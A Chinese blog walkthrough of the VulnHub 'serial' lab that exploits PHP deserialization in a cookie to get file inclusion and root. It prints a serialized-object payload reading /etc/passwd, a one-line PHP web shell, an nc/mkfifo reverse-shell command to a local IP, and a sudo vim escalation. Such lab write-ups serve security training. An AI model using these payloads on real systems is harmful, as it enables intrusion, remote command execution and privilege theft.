php反序列化靶机serial实战

最新推荐文章于 2023-04-12 16:59:54 发布
最新推荐文章于 2023-04-12 16:59:54 发布
阅读量1k 收藏 2
点赞数 2
分类专栏: 靶机 文章标签: php shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzgslh/article/details/105374936
版权

靶机描述

今天研究一下php反序列化,靶机serial实战。目标为获取root权限。

靶机信息

可以去vulhub上下载此靶机:
https://www.vulnhub.com/entry/serial-1,349/
下载好,之后,使用Vmware新建虚拟机打开,步骤如下:

  • 1.首先创建新的虚拟机。

在这里插入图片描述

  • 2.然后选择客户机版本为Ubuntu 64位。

在这里插入图片描述

  • 3.然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。

在这里插入图片描述
在这里插入图片描述

  • 4.打开虚拟机,环境配置完成。

在这里插入图片描述

渗透测试过程

探测主机存活(目标主机IP地址)

  • 使用nmap探测主机存活或者使用Kali里的netdicover进行探测。

-PS/-PA/-PU/-PY:这些参数即可以探测主机存活,也可以同时进行端口扫描。(例如:-PS,发送TCP SYN包进行主机探测)

扫描到存活主机:192.168.242.129,开放了22和80端口

在这里插入图片描述

访问web服务

  • 1.首先访问80端口,页面只有一行文本:Hello sk4This is a beta test for new cookie handler,提示这里是新cookie进行程序测试,那我们查看cookie。

在这里插入图片描述

  • 2.F12查看,是一串base64编码。

在这里插入图片描述

  • 3.使用burpsuite解码,是一串代码,下面有解释。

在这里插入图片描述

思路一:

  • 尝试逻辑绕过,将sk4换成admin,看看是否有什么信息。

在这里插入图片描述

  • 这里直接报500错误,没办法,只有找其他思路。

在这里插入图片描述

思路二:

目录扫描

  • 1.使用dirbuster工具进行扫描,这里扫到一个/backup/目录。

在这里插入图片描述

  • 2.打开查看,是一个zip文件,下载查看,是三个源代码文件。

在这里插入图片描述
在这里插入图片描述

代码审计

  • 1.通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。

在这里插入图片描述

  • 2.经过代码审计可构造payload,尝试读取passwd文件,payload如下:
<?php
  class Log {
    private $type_log = "/etc/passwd";
  }

  class User {
    private $name = "admin";
    private $wel;

    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));

O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}},然后在命令行窗口,打开python,添加base64模块,再经序列化和base64编码后,进行执行,但是一直不能成功执行。

在这里插入图片描述
在这里插入图片描述

  • 3.通过对比发现base64存在一定的不同,需要进行修改,将空格使用\x00替换,然后再进行编码读取/etc/passwd文件。

这里我们仍然使用python进行操作,首先使用replace()函数将payload中所有的空格替换成\x00:'O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}'.replace(' ','\x00'),然后再使用base64模块进行编码:base64.b64encode(b'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}'),编码后的payload如下:Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==

在这里插入图片描述

  • 4.然后在burpsuite的repeater模块中,将payload赋值给cookie中的user,然后点击 [go],读取到passwd文件,可以看到可登录系统用户除了root,还有sk4。

在这里插入图片描述

获取shell

  • 1.因为这样执行命令不太方便,我们可以换一种方式,在本地打开web服务,上传一个txt文件,内容是:<?php system($_GET['cmd']);?>

在这里插入图片描述

  • 2.然后构造payload:O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:26:"http://本地IP/c.txt";}},然后进行序列化和base64编码执行。

在这里插入图片描述
在这里插入图片描述

命令执行成功。

在这里插入图片描述

  • 3.添加反弹shell:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f,没有回应,但反弹shell成功。

在这里插入图片描述

在这里插入图片描述

提升权限

  • 1.查看系统版本,内核版本。

在这里插入图片描述

  • 2.查看根目录发现存在敏感文件credentials.txt.bak。

在这里插入图片描述

  • 3.打开查看是用户名和密码,SSH登录。

在这里插入图片描述

在这里插入图片描述

  • 4.刚才查看了版本,暂时找不到可提权的漏洞,那么,我们尝试找一下当前用户可执行与无法执行的指令,可以看到vim编辑器对所有用户NOPASSWD。

在这里插入图片描述

  • 5.尝试提权,试试sudo vim,进入到命令模式输入!bash。

在这里插入图片描述

  • 6.提权成功。

在这里插入图片描述

zzgslh
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
序列漏洞-02】PHP序列漏洞实验详解
cc
03-02 2771
序列:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列是对象转换为字符串的过程}序列:程序把存储或传输的字节序列恢复为对象的过程。{序列则是字符串转为对象的过程}如果字符串客户端可控,就会造成web应用序列任意对象,严重的是在序列的过程中会触发一些可以执行的php代码,例如phpinfoPHP中的序列序列,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
PHP序列【原理+CTF实战
最新发布
2301_80127209的博客
04-19 843
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。序列的目的是方便数据的传输和存储,在PHP中,序列序列一般用做缓存,比如session缓存,cookie等.进行绕过,(在赛后我把题给Ssh1y写了,他的利用方式是nc弹个shell,属实是开拓了我的眼界)。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。”,这显然就无法继续利用了。编码后在前部加7个1。
PHP序列&魔术方法详细解析及实例&公私有属性对比
ran的博客
04-12 1943
2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。1.实验代码部分如下。1.实验代码部分如下。1.实验代码部分如下。1.实验代码部分如下。1.实验代码部分如下。
php serial.class,php-serial | 学步园
weixin_31325725的博客
03-12 200
This PHP class can be used to communicate with a serial port under Linux, OSX or Windows.DescriptionGives serial access to PHP under linux, OSX and Windows (write-only under Windows).This class can be...
vulnhub靶场serial-php渗透
问彡心的博客
07-31 1337
整个渗透过程中主要漏洞在于序列的利用配合远程文件包含,将wel的对象替换,由于恰好Log对象中存在handler函数且有文件包含,才能进行利用,我把这招称之为"偷梁换柱",还是很形象的,当执行一句话木马时,离成功也就不远了,随之从弹终端中得到的账户密码进行远程登陆,在执行命令过程中通过提示发现了sudo下的vim是可以直接执行的,在vim命令行中有!command暂时离开vim到指令列模式下执行command的显示结果,利用此功能成功借用了bash来执行输入的命令httpshttps。...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Apache Log4j序列命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
靶机happycorp实战练习
09-08
学习
靶机操作练习,earth 靶机实战练习
09-08
在网络安全和渗透测试的学习过程中,靶机操作是一个重要的实践环节。在这个案例中,我们通过一个名为"earth"的靶机进行了一系列的操作,旨在提升信息收集、Web应用分析、权限提升和漏洞利用等技能。 首先,我们进行...
php-serial:建立与串行端口的连接
05-08
PHP序列 建立与串行端口的连接。 该类用PHP编写,与其他用相同语言编写的类不同,它不会根据字符串的大小停止读取缓冲区,而是等待锁,然后返回在缓冲区中捕获的消息。 停止在串行端口缓冲区中接收数据的那一刻,该块由串行端口上的NULL值给出。 捕获此NULL值并将其定义为消息的结尾。 此时,将返回字符串的值。 可以从read方法中定义要接收的锁数的值,以便确定在将字符串的值返回到消息之前要等待多少个锁。 也可能是串行端口正在发送NULL值,而无需阻塞它。 警告此类使用“ stty”命令,并且仅在GNU / LINUX中进行了测试 通过AT命令发送消息的示例: 包括'serial.php'; $ serial =新的Serial(); $ serial-> write('AT + CMGF = 1'); $ serial-> write(chr(13)); $ telefon
serialport:PHP串行端口
01-28
串行端口 使用PHP连接到串行端口 受启发,我对其进行了简,并包含了composer.json以通过composer安装。 实际上,它可以在Linux上运行。 该库适用于Arduino。 通过作曲家安装 composer require "lepiaf/serialport" 如何使用 您可以在文件夹中查看完整的示例。 它包含一个基本的Arduino草图和php文件以读取它。 用解析器实例一个新的SerialPort对象并配置tty。 <?php use lepiaf\ SerialPort \ SerialPort ; use lepiaf\ SerialPort \ Parser \ SeparatorParser ; use lepiaf\ SerialPort \ Configure \ TTYConfigure ; $ serialPort = new SerialPort ( new SeparatorParser (), new TTYConfigure ()); $ serialPort -> open ( "/dev/ttyACM0" ); while (
PHP序列
m0_69637056的博客
07-10 5638
PHP
php序列语句实例,PHP序列的一些例子
weixin_34006872的博客
03-11 568
之前web一直被PHP序列的一些问题困扰,现在痛定思痛,决定好好的总结一番(大佬请略过)一般序列能用的例子都是利用了PHP中的一些可以自动调用的特殊函数,类似于C++中的构造函数之类的,不需要其他函数调用即可自动运行。通常称这些函数为魔幻函数,常用的魔幻函数包括construct(),destruct(), sleep(),wakeup(), toString().首先我们以constr...
Pikachu靶场-PHP序列
自强不息
12-31 204
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
PHP序列学习(包含实例)
kiwi的博客
11-09 316
上面的是某道ctf题目其中highlight_file为高亮显示某个文件里面的内容serialize为序列函数unserialize为序列函数flag就在flag.php文件里面我们的思路就是利用highlight_file函数将flag.php读取获得flag__toString为当输出字符串的时候才会执行的方法就等于
php序列总结
weixin_44576725的博客
04-08 6526
php序列总结 基础知识 序列 序列就是将 对象object、字符串string、数组array、变量 转换成具有一定格式的字符串,方便保持稳定的格式在文件中传输,以便还原为原来的内容。 serialize ( mixed $value ) : string serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。 example: class Test { public $name = "s1ng"; private $age = 19;
php serial.class,PhpSerial:没有可用的样式-似乎无法正常工作
weixin_32206303的博客
03-12 375
我正在从事一个涉及使用Raspberry Pi上的UART引脚读写串行板的项目.但是,我已经撞墙了.每当我尝试使用PhpSerial时,我总是会收到错误消息:Fatal error: No stty available, unable to run. in /var/www/PHP-Serial/examples/PhpSerial.php on line 56我用输入尝试了许多配置:// Fir...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值